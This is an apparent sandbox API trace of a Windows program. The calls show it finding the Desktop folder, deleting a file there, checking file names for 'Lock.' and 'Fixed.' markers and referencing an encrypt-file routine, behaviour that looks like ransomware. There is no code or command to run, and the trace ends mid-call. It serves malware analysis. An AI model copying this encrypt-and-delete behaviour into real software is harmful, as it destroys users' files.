[0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0150.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0150.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0150.419] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0150.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0150.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0150.419] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0150.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0150.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0150.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0150.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0150.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0150.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0150.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0150.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0150.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0150.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0150.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0150.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0150.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0150.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0150.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0150.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0150.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e563a8 [0150.420] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ElwQwY9lqgU4Me-0 5E.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ElwQwY9lqgU4Me-0 5E.gif", lpFilePart=0x8cedf4*="ElwQwY9lqgU4Me-0 5E.gif") returned 0x2f [0150.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0150.420] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ElwQwY9lqgU4Me-0 5E.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\elwqwy9lqgu4me-0 5e.gif")) returned 0x20 [0150.420] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ElwQwY9lqgU4Me-0 5E.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fe09ee0, ftCreationTime.dwHighDateTime=0x1d5e2da, ftLastAccessTime.dwLowDateTime=0xc350ea20, ftLastAccessTime.dwHighDateTime=0x1d5ecea, ftLastWriteTime.dwLowDateTime=0xc350ea20, ftLastWriteTime.dwHighDateTime=0x1d5ecea, nFileSizeHigh=0x0, nFileSizeLow=0x15cf0, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="ElwQwY9lqgU4Me-0 5E.gif", cAlternateFileName="ELWQWY~1.GIF")) returned 0xa87250 [0150.420] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ElwQwY9lqgU4Me-0 5E.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\elwqwy9lqgu4me-0 5e.gif")) returned 1 [0150.696] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fe09ee0, ftCreationTime.dwHighDateTime=0x1d5e2da, ftLastAccessTime.dwLowDateTime=0xc350ea20, ftLastAccessTime.dwHighDateTime=0x1d5ecea, ftLastWriteTime.dwLowDateTime=0xc350ea20, ftLastWriteTime.dwHighDateTime=0x1d5ecea, nFileSizeHigh=0x0, nFileSizeLow=0x15cf0, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="ElwQwY9lqgU4Me-0 5E.gif", cAlternateFileName="ELWQWY~1.GIF")) returned 0 [0150.696] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0150.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0150.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0150.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0150.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0150.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0150.697] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0150.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0150.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0150.697] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0150.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0150.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0150.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0150.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0150.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0150.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0150.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0150.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0150.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0150.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0150.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0150.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0150.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0150.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0150.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0150.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0150.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0150.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0150.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0150.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e563a8 [0150.698] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ElwQwY9lqgU4Me-0 5E.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\ElwQwY9lqgU4Me-0 5E.gif", lpFilePart=0x8cf650*="ElwQwY9lqgU4Me-0 5E.gif") returned 0x2f [0150.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0150.698] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ElwQwY9lqgU4Me-0 5E.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\elwqwy9lqgu4me-0 5e.gif")) returned 0xffffffff [0150.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0150.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0150.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0150.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0150.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0150.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0150.698] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0150.698] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.698] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0150.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0150.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0150.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0150.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0150.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0150.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0150.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0150.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0150.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0150.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0150.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0150.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0150.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F Elbom0O1NrT.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Elbom0O1NrT.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Elbom0O1NrT.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lbom0O1NrT.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bom0O1NrT.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="om0O1NrT.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m0O1NrT.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0O1NrT.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O1NrT.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1NrT.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0150.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrT.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rT.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0150.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0150.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0150.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0150.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0150.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0150.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0150.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0150.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0150.700] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0150.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0150.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0150.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0150.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0150.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0150.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0150.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0150.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0150.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0150.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0150.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0150.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0150.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0150.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0150.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0150.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0150.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0150.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0150.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0150.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F Elbom0O1NrT.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Elbom0O1NrT.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Elbom0O1NrT.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lbom0O1NrT.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bom0O1NrT.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="om0O1NrT.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m0O1NrT.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0O1NrT.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O1NrT.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1NrT.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0150.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrT.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.702] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rT.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0150.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0150.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0150.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0150.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0150.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0150.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0150.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0150.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0150.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0150.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0150.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0150.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0150.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0150.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0150.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0150.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0150.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0150.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0150.703] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0150.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0150.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0150.703] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0150.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0150.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0150.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0150.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0150.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0150.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0150.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0150.704] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0150.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0150.704] RtlAllocateHeap 